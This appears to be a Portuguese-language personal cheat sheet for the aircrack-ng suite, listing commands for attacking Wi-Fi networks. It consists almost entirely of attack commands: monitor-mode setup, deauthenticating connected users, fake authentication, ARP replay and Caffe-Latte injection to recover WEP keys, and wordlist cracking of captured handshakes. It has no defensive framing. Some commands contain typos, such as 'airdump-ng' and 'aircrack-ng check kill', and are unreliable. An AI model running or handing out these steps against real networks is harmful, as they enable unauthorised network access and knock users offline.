Page cover

Aircrack-ng (teste)

iwlist wlan0 scan (opcional - iwlist wlan0 scan | head -11 [para abrir só as 11 primeiras linhas)

airmon-ng start wlan0

airmon-ng check kill wlan0mon

iwconfig

tcpdump -vv -nn -i wlan0

aircrack-ng check kill

airodump-ng -M wlan0mon --ignore-negative-one

airodump-ng -c "channel" --bssid "alvo" -w "nomearquivo" wlan0mon --ignore-negative-one

Desconecte algum usuárioc/ alguma dessas opções:

Para captura de handshake eficiente use:

aireplay-ng -1 6000 -e "nome rede" -a "bssid" -h "station" wlan0mon --ignore-negative-one

Outras variantes para aireplay-ng:

aireplay-ng -1 0 -e "nome da rede" -a "bssid alvo" -h 02:54:2d:31:55:96 wlan0mon

aireplay-ng --deauth 50 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon

ou

aireplay-ng --deauth 100 -a 7C:05:07:DE:6E:6A -e 60:AB:67:FF:42:A4 wlan0mon

PARA OBTER A CHAVE WEP DIRETAMENTE:

aireplay-ng --caffe-latte -e defhack -c C4:27:95:BD:29:3C wlan0

Você pode usar os seguintes comandos durante ataque inicial:

airdump-ng --bssid C4:27:95:BD:29:3C --channel 6 --write WEPquebra wlan0

Lembre-se (5000 a 10000 IVs são suficientes para quebrar uma chave de 40bits e de 20000 a 30000 IVs para uma chave de 104 bits.)

Injete Requisições ARP com o Aireplay-ng

(Importante: o airodump-ng deve continuar rodando em outra janela)

aireplay-ng --arpreplay -b C4:27:95:BD:29:3C -h [station] wlan0

Aṕos parar os programas:

ls WEP* -l

(arquivos c/ 1 foram gerados c/ menos de 20000 IVs, com 2 são justamente os gerados na última execução, na qual consegui 20000 IVs)

aircrack-ng WEPquebra-02.cap

Decodificar frames c/ airdecap-ng:

airdecap-ng -w C4:27:95:BD:29:3C <arquivo.cap>

ATAQUE CAFFE-LATTE:

aireplay-ng --caffe-latte -e defhack -c C4:27:95:BD:29:3C wlan0

1: Mensagem de falsa autenticação;

0: Tempo de reassociação em segundos;

-e: "Nome da rede"

-a: "bssid alvo" MAC do AP (alvo)

-h: 02:54:2d:31:55:96 Endereço MAC da interface wlan0;

(para encontrar a senha no arquivo cap)

a) Usando apenas aircrack-ng:

aircrack-ng -w "worlist" -b "bssid alvo" arquivo.cap

b) Criando sessão com aircrack-ng:

aircrack-ng --new-session current.session -w "wordlist" "arquivo.cap"

Para restaurar a sessão, use --restore-session:

Last updated